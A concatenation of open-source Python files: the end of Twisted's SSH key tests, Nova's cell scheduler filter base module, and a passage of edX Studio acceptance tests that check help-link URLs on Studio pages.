self.assertEquals(key.public().toString('openssh', 'comment'),
keydata.publicDSA_openssh)
self.assertEquals(key.public().toString('openssh'),
keydata.publicDSA_openssh[:-8]) # no comment
def test_toLSH(self):
"""
Test that the Key object generates LSH keys correctly.
"""
key = keys.Key.fromString(keydata.privateRSA_openssh)
self.assertEquals(key.toString('lsh'), keydata.privateRSA_lsh)
self.assertEquals(key.public().toString('lsh'),
keydata.publicRSA_lsh)
key = keys.Key.fromString(keydata.privateDSA_openssh)
self.assertEquals(key.toString('lsh'), keydata.privateDSA_lsh)
self.assertEquals(key.public().toString('lsh'),
keydata.publicDSA_lsh)
def test_toAgentv3(self):
"""
Test that the Key object generates Agent v3 keys correctly.
"""
key = keys.Key.fromString(keydata.privateRSA_openssh)
self.assertEquals(key.toString('agentv3'), keydata.privateRSA_agentv3)
key = keys.Key.fromString(keydata.privateDSA_openssh)
self.assertEquals(key.toString('agentv3'), keydata.privateDSA_agentv3)
def test_toStringErrors(self):
"""
Test that toString raises errors appropriately.
"""
self.assertRaises(keys.BadKeyError, keys.Key(self.rsaObj).toString,
'bad_type')
def test_sign(self):
"""
Test that the Key object generates correct signatures.
"""
key = keys.Key.fromString(keydata.privateRSA_openssh)
self.assertEquals(key.sign(''), self.rsaSignature)
key = keys.Key.fromString(keydata.privateDSA_openssh)
self.assertEquals(key.sign(''), self.dsaSignature)
def test_verify(self):
"""
Test that the Key object correctly verifies signatures.
"""
key = keys.Key.fromString(keydata.publicRSA_openssh)
self.assertTrue(key.verify(self.rsaSignature, ''))
self.assertFalse(key.verify(self.rsaSignature, 'a'))
self.assertFalse(key.verify(self.dsaSignature, ''))
key = keys.Key.fromString(keydata.publicDSA_openssh)
self.assertTrue(key.verify(self.dsaSignature, ''))
self.assertFalse(key.verify(self.dsaSignature, 'a'))
self.assertFalse(key.verify(self.rsaSignature, ''))
def test_repr(self):
"""
Test the pretty representation of Key.
"""
self.assertEquals(repr(keys.Key(self.rsaObj)),
"""<RSA Private Key (0 bits)
attr e:
\t02
attr d:
\t03
attr n:
\t01
attr q:
\t05
attr p:
\t04
attr u:
\t04>""")
| agpl-3.0 |
isyippee/nova | nova/cells/filters/__init__.py | 61 | 2105 | # Copyright (c) 2012-2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cell scheduler filters
"""
from oslo_log import log as logging
from nova import filters
from nova import policy
LOG = logging.getLogger(__name__)
class BaseCellFilter(filters.BaseFilter):
"""Base class for cell filters."""
def authorized(self, ctxt):
"""Return whether or not the context is authorized for this filter
based on policy.
The policy action is "cells_scheduler_filter:<name>" where <name>
is the name of the filter class.
"""
name = 'cells_scheduler_filter:' + self.__class__.__name__
target = {'project_id': ctxt.project_id,
'user_id': ctxt.user_id}
return policy.enforce(ctxt, name, target, do_raise=False)
def _filter_one(self, cell, filter_properties):
return self.cell_passes(cell, filter_properties)
def cell_passes(self, cell, filter_properties):
"""Return True if the CellState passes the filter, otherwise False.
Override this in a subclass.
"""
raise NotImplementedError()
class CellFilterHandler(filters.BaseFilterHandler):
def __init__(self):
super(CellFilterHandler, self).__init__(BaseCellFilter)
def all_filters():
"""Return a list of filter classes found in this directory.
This method is used as the default for available scheduler filters
and should return a list of all filter classes available.
"""
return CellFilterHandler().get_all_classes()
| apache-2.0 |
fintech-circle/edx-platform | common/test/acceptance/tests/studio/test_studio_help.py | 1 | 43324 | """
Test the Studio help links.
"""
from unittest import skip
from nose.plugins.attrib import attr
from common.test.acceptance.fixtures.course import XBlockFixtureDesc
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.studio.asset_index import AssetIndexPage
from common.test.acceptance.pages.studio.course_info import CourseUpdatesPage
from common.test.acceptance.pages.studio.edit_tabs import PagesPage
from common.test.acceptance.pages.studio.import_export import (
ExportCoursePage,
ExportLibraryPage,
ImportCoursePage,
ImportLibraryPage
)
from common.test.acceptance.pages.studio.index import DashboardPage, HomePage, IndexPage
from common.test.acceptance.pages.studio.library import LibraryPage
from common.test.acceptance.pages.studio.overview import CourseOutlinePage
from common.test.acceptance.pages.studio.settings import SettingsPage
from common.test.acceptance.pages.studio.settings_advanced import AdvancedSettingsPage
from common.test.acceptance.pages.studio.settings_certificates import CertificatesPage
from common.test.acceptance.pages.studio.settings_graders import GradingPage
from common.test.acceptance.pages.studio.settings_group_configurations import GroupConfigurationsPage
from common.test.acceptance.pages.studio.textbook_upload import TextbookUploadPage
from common.test.acceptance.pages.studio.users import CourseTeamPage, LibraryUsersPage
from common.test.acceptance.pages.studio.utils import click_css, click_studio_help, studio_help_links
from common.test.acceptance.tests.helpers import (
AcceptanceTest,
assert_nav_help_link,
assert_side_bar_help_link,
url_for_help
)
from common.test.acceptance.tests.studio.base_studio_test import ContainerBase, StudioCourseTest, StudioLibraryTest
def _get_expected_documentation_url(path):
"""
Returns the expected URL for the building and running a course documentation.
"""
return url_for_help('course_author', path)
@attr(shard=10)
class StudioHelpTest(StudioCourseTest):
"""Tests for Studio help."""
def test_studio_help_links(self):
"""Test that the help links are present and have the correct content."""
page = DashboardPage(self.browser)
page.visit()
click_studio_help(page)
links = studio_help_links(page)
expected_links = [{
'href': u'http://docs.edx.org/',
'text': u'edX Documentation',
'sr_text': u'Access documentation on http://docs.edx.org'
}, {
'href': u'https://open.edx.org/',
'text': u'Open edX Portal',
'sr_text': u'Access the Open edX Portal'
}, {
'href': u'https://www.edx.org/course/overview-creating-edx-course-edx-edx101#.VO4eaLPF-n1',
'text': u'Enroll in edX101',
'sr_text': u'Enroll in edX101: Overview of Creating an edX Course'
}, {
'href': u'https://www.edx.org/course/creating-course-edx-studio-edx-studiox',
'text': u'Enroll in StudioX',
'sr_text': u'Enroll in StudioX: Creating a Course with edX Studio'
}, {
'href': u'mailto:partner-support@example.com',
'text': u'Contact Us',
'sr_text': 'Send an email to partner-support@example.com'
}]
for expected, actual in zip(expected_links, links):
self.assertEqual(expected['href'], actual.get_attribute('href'))
self.assertEqual(expected['text'], actual.text)
self.assertEqual(
expected['sr_text'],
actual.find_element_by_xpath('following-sibling::span').text
)
@attr(shard=10)
class SignInHelpTest(AcceptanceTest):
"""
Tests help links on 'Sign In' page
"""
def setUp(self):
super(SignInHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_sign_in_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Sign In' page.
Given that I am on the 'Sign In" page.
And I want help about the sign in
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
sign_in_page = self.index_page.click_sign_in()
expected_url = _get_expected_documentation_url('/getting_started/index.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=sign_in_page,
href=expected_url,
signed_in=False
)
@attr(shard=10)
class SignUpHelpTest(AcceptanceTest):
"""
Tests help links on 'Sign Up' page.
"""
def setUp(self):
super(SignUpHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_sign_up_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Sign Up' page.
Given that I am on the 'Sign Up" page.
And I want help about the sign up
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
sign_up_page = self.index_page.click_sign_up()
expected_url = _get_expected_documentation_url('/getting_started/index.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=sign_up_page,
href=expected_url,
signed_in=False
)
@attr(shard=10)
class HomeHelpTest(StudioCourseTest):
"""
Tests help links on 'Home'(Courses tab) page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(HomeHelpTest, self).setUp()
self.home_page = HomePage(self.browser)
self.home_page.visit()
def test_course_home_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Home'(Courses tab) page.
Given that I am on the 'Home'(Courses tab) page.
And I want help about the courses
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.home_page,
href=expected_url
)
def test_course_home_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Home'(Courses tab) page.
Given that I am on the 'Home'(Courses tab) page.
And I want help about the courses
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.home_page,
href=expected_url,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class NewCourseHelpTest(AcceptanceTest):
"""
Test help links while creating a new course.
"""
def setUp(self):
super(NewCourseHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
self.assertTrue(self.dashboard_page.new_course_button.present)
self.dashboard_page.click_new_course_button()
def test_course_create_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Create a New Course' page in the dashboard.
Given that I am on the 'Create a New Course' page in the dashboard.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=expected_url
)
def test_course_create_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Create a New Course' page in the dashboard.
Given that I am on the 'Create a New Course' page in the dashboard.
And I want help about the process
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.dashboard_page,
href=expected_url,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class NewLibraryHelpTest(AcceptanceTest):
"""
Test help links while creating a new library
"""
def setUp(self):
super(NewLibraryHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
self.assertTrue(self.dashboard_page.has_new_library_button)
self.dashboard_page.click_new_library()
def test_library_create_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Create a New Library' page in the dashboard.
Given that I am on the 'Create a New Library' page in the dashboard.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=expected_url
)
def test_library_create_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Create a New Library' page in the dashboard.
Given that I am on the 'Create a New Library' page in the dashboard.
And I want help about the process
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.dashboard_page,
href=expected_url,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class LibraryTabHelpTest(AcceptanceTest):
"""
Test help links on the library tab present at dashboard.
"""
def setUp(self):
super(LibraryTabHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
def test_library_tab_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Home'(Courses tab) page.
Given that I am on the 'Home'(Courses tab) page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
self.assertTrue(self.dashboard_page.has_new_library_button)
click_css(self.dashboard_page, '#course-index-tabs .libraries-tab', 0, False)
expected_url = _get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=expected_url
)
@attr(shard=10)
class LibraryHelpTest(StudioLibraryTest):
"""
Test help links on a Library page.
"""
def setUp(self):
super(LibraryHelpTest, self).setUp()
self.library_page = LibraryPage(self.browser, self.library_key)
self.library_user_page = LibraryUsersPage(self.browser, self.library_key)
def test_library_content_nav_help(self):
"""
Scenario: Help link in navigation bar is working on content
library page(click a library on the Library list page).
Given that I am on the content library page(click a library on the Library list page).
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
self.library_page.visit()
expected_url = _get_expected_documentation_url('/course_components/libraries.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_page,
href=expected_url
)
def test_library_content_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on
content library page(click a library on the Library list page).
Given that I am on the content library page(click a library on the Library list page).
And I want help about the process
And I click the 'Learn more about content libraries' in the sidebar links
Then Help link should open.
And help url should be correct
"""
self.library_page.visit()
expected_url = _get_expected_documentation_url('/course_components/libraries.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_page,
href=expected_url,
help_text='Learn more about content libraries'
)
def test_library_user_access_setting_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'User Access'
settings page of library.
Given that I am on the 'User Access' settings page of library.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct.
"""
self.library_user_page.visit()
expected_url = _get_expected_documentation_url(
'/course_components/libraries.html#give-other-users-access-to-your-library'
)
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_user_page,
href=expected_url,
)
@attr(shard=10)
class LibraryImportHelpTest(StudioLibraryTest):
"""
Test help links on a Library import and export pages.
"""
def setUp(self):
super(LibraryImportHelpTest, self).setUp()
self.library_import_page = ImportLibraryPage(self.browser, self.library_key)
self.library_import_page.visit()
def test_library_import_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Library import page.
Given that I am on the Library import page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_components/libraries.html#import-a-library')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_import_page,
href=expected_url
)
def test_library_import_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Library import page.
Given that I am on the Library import page.
And I want help about the process
And I click the 'Learn more about importing a library' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_components/libraries.html#import-a-library')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_import_page,
href=expected_url,
help_text='Learn more about importing a library'
)
@attr(shard=10)
class LibraryExportHelpTest(StudioLibraryTest):
"""
Test help links on a Library export pages.
"""
def setUp(self):
super(LibraryExportHelpTest, self).setUp()
self.library_export_page = ExportLibraryPage(self.browser, self.library_key)
self.library_export_page.visit()
def test_library_export_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Library export page.
Given that I am on the Library export page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_components/libraries.html#export-a-library')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_export_page,
href=expected_url
)
def test_library_export_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Library export page.
Given that I am on the Library export page.
And I want help about the process
And I click the 'Learn more about exporting a library' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_components/libraries.html#export-a-library')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_export_page,
href=expected_url,
help_text='Learn more about exporting a library'
)
@attr(shard=10)
class CourseOutlineHelpTest(StudioCourseTest):
"""
Tests help links on course outline page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(CourseOutlineHelpTest, self).setUp()
self.course_outline_page = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_outline_page.visit()
@skip("This scenario depends upon TNL-5460")
def test_course_outline_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Course Outline page
Given that I am on the Course Outline page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/developing_course/course_outline.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_outline_page,
href=expected_url
)
def test_course_outline_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Course Outline page
Given that I am on the Course Outline page.
And I want help about the process
And I click the 'Learn more about the course outline' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/developing_course/course_outline.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_outline_page,
href=expected_url,
help_text='Learn more about the course outline',
index=0
)
@attr(shard=10)
class CourseUpdateHelpTest(StudioCourseTest):
"""
Test help links on Course Update page
"""
def setUp(self): # pylint: disable=arguments-differ
super(CourseUpdateHelpTest, self).setUp()
self.course_update_page = CourseUpdatesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_update_page.visit()
def test_course_update_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Course Update' page
Given that I am on the 'Course Update' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_assets/handouts_updates.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_update_page,
href=expected_url,
)
@attr(shard=10)
class AssetIndexHelpTest(StudioCourseTest):
"""
Test help links on Course 'Files & Uploads' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(AssetIndexHelpTest, self).setUp()
self.course_asset_index_page = AssetIndexPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_asset_index_page.visit()
def test_asset_index_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Files & Uploads' page
Given that I am on the 'Files & Uploads' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_assets/course_files.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_asset_index_page,
href=expected_url,
)
def test_asset_index_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Files & Uploads' page
Given that I am on the 'Files & Uploads' page.
And I want help about the process
And I click the 'Learn more about managing files' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_assets/course_files.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_asset_index_page,
href=expected_url,
help_text='Learn more about managing files'
)
@attr(shard=10)
class CoursePagesHelpTest(StudioCourseTest):
"""
Test help links on Course 'Pages' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(CoursePagesHelpTest, self).setUp()
self.course_pages_page = PagesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_pages_page.visit()
def test_course_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Pages' page
Given that I am on the 'Pages' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_assets/pages.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_pages_page,
href=expected_url,
)
@attr(shard=10)
class UploadTextbookHelpTest(StudioCourseTest):
"""
Test help links on Course 'Textbooks' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(UploadTextbookHelpTest, self).setUp()
self.course_textbook_upload_page = TextbookUploadPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_textbook_upload_page.visit()
def test_course_textbook_upload_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Textbooks' page
Given that I am on the 'Textbooks' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_assets/textbooks.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_textbook_upload_page,
href=expected_url,
)
def test_course_textbook_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Textbooks' page
Given that I am on the 'Textbooks' page
And I want help about the process
And I click the 'Learn more about textbooks' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_assets/textbooks.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_textbook_upload_page,
href=expected_url,
help_text='Learn more about textbooks'
)
@attr(shard=10)
class StudioUnitHelpTest(ContainerBase):
"""
Tests help links on Unit page.
"""
def setUp(self, is_staff=True):
super(StudioUnitHelpTest, self).setUp(is_staff=is_staff)
def populate_course_fixture(self, course_fixture):
"""
Populates the course fixture.
We are modifying 'advanced_modules' setting of the
course.
Also add a section with a subsection and a unit.
"""
course_fixture.add_advanced_settings(
{u"advanced_modules": {"value": ["split_test"]}}
)
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit')
)
)
)
def test_unit_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Unit page.
Given that I am on the Unit page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
unit_page = self.go_to_unit_page()
expected_url = _get_expected_documentation_url('/developing_course/course_units.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=unit_page,
href=expected_url,
)
@attr(shard=10)
class SettingsHelpTest(StudioCourseTest):
"""
Tests help links on Schedule and Details Settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(SettingsHelpTest, self).setUp()
self.settings_page = SettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.settings_page.visit()
def test_settings_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Settings page.
Given that I am on the Settings page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/set_up_course/setting_up_student_view.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.settings_page,
href=expected_url,
)
@attr(shard=10)
class GradingPageHelpTest(StudioCourseTest):
"""
Tests help links on Grading page
"""
def setUp(self, is_staff=False, test_xss=True):
super(GradingPageHelpTest, self).setUp()
self.grading_page = GradingPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.grading_page.visit()
def test_grading_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Grading page.
Given that I am on the Grading page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/grading/index.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.grading_page,
href=expected_url,
)
@attr(shard=10)
class CourseTeamSettingsHelpTest(StudioCourseTest):
"""
Tests help links on Course Team settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(CourseTeamSettingsHelpTest, self).setUp()
self.course_team_settings_page = CourseTeamPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_team_settings_page.visit()
def test_course_course_team_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Course Team settings page
Given that I am on the Course Team settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/set_up_course/course_staffing.html#add-course-team-members')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_team_settings_page,
href=expected_url,
)
@attr(shard=10)
class CourseGroupConfigurationHelpTest(StudioCourseTest):
"""
Tests help links on course Group Configurations settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(CourseGroupConfigurationHelpTest, self).setUp()
self.course_group_configuration_page = GroupConfigurationsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_group_configuration_page.visit()
def test_course_group_conf_nav_help(self):
"""
Scenario: Help link in navigation bar is working on
Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/index.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_group_configuration_page,
href=expected_url,
)
def test_course_group_conf_content_group_side_bar_help(self):
"""
Scenario: Help link in side bar under the 'content group' is working
on Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Learn More' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/course_features/cohorts/cohorted_courseware.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_group_configuration_page,
href=expected_url,
help_text='Learn More'
)
@attr(shard=10)
class AdvancedSettingHelpTest(StudioCourseTest):
"""
Tests help links on course Advanced Settings page.
"""
def setUp(self, is_staff=False, test_xss=True):
super(AdvancedSettingHelpTest, self).setUp()
self.advanced_settings = AdvancedSettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.advanced_settings.visit()
def test_advanced_settings_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Advanced Settings page.
Given that I am on the Advanced Settings page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/index.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.advanced_settings,
href=expected_url,
)
@attr(shard=10)
class CertificatePageHelpTest(StudioCourseTest):
"""
Tests help links on course Certificate settings page.
"""
def setUp(self, is_staff=False, test_xss=True):
super(CertificatePageHelpTest, self).setUp()
self.certificates_page = CertificatesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.certificates_page.visit()
def test_certificate_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Certificate settings page
Given that I am on the Certificate settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/set_up_course/creating_course_certificates.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.certificates_page,
href=expected_url,
)
def test_certificate_page_side_bar_help(self):
"""
Scenario: Help link in side bar is working Certificate settings page
Given that I am on the Certificate settings page
And I want help about the process
And I click the 'Learn more about certificates' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/set_up_course/creating_course_certificates.html')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.certificates_page,
href=expected_url,
help_text='Learn more about certificates',
)
@attr(shard=10)
class GroupExperimentConfigurationHelpTest(ContainerBase):
"""
Tests help links on course Group Configurations settings page
It is related to Experiment Group Configurations on the page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(GroupExperimentConfigurationHelpTest, self).setUp()
self.group_configuration_page = GroupConfigurationsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
# self.create_poorly_configured_split_instance()
self.group_configuration_page.visit()
def populate_course_fixture(self, course_fixture):
"""
Populates the course fixture.
We are modifying 'advanced_modules' setting of the
course.
"""
course_fixture.add_advanced_settings(
{u"advanced_modules": {"value": ["split_test"]}}
)
def test_course_group_configuration_experiment_side_bar_help(self):
"""
Scenario: Help link in side bar under the 'Experiment Group Configurations'
is working on Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Learn More' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url(
'/course_features/content_experiments/content_experiments_configure.html'
'#set-up-group-configurations-in-edx-studio'
)
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.group_configuration_page,
href=expected_url,
help_text='Learn More',
)
@attr(shard=10)
class ToolsImportHelpTest(StudioCourseTest):
"""
Tests help links on tools import pages.
"""
def setUp(self, is_staff=False, test_xss=True):
super(ToolsImportHelpTest, self).setUp()
self.import_page = ImportCoursePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.import_page.visit()
def test_tools_import_nav_help(self):
"""
Scenario: Help link in navigation bar is working on tools Library import page
Given that I am on the Library import tools page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/releasing_course/export_import_course.html#import-a-course')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.import_page,
href=expected_url,
)
def test_tools_import_side_bar_help(self):
"""
Scenario: Help link in side bar is working on tools Library import page
Given that I am on the tools Library import page
And I want help about the process
And I click the 'Learn more about importing a course' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/releasing_course/export_import_course.html#import-a-course')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.import_page,
href=expected_url,
help_text='Learn more about importing a course',
)
@attr(shard=10)
class ToolsExportHelpTest(StudioCourseTest):
"""
Tests help links on tools export pages.
"""
def setUp(self, is_staff=False, test_xss=True):
super(ToolsExportHelpTest, self).setUp()
self.export_page = ExportCoursePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.export_page.visit()
def test_tools_import_nav_help(self):
"""
Scenario: Help link in navigation bar is working on tools Library export page
Given that I am on the Library export tools page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/releasing_course/export_import_course.html#export-a-course')
# Assert that help link is correct.
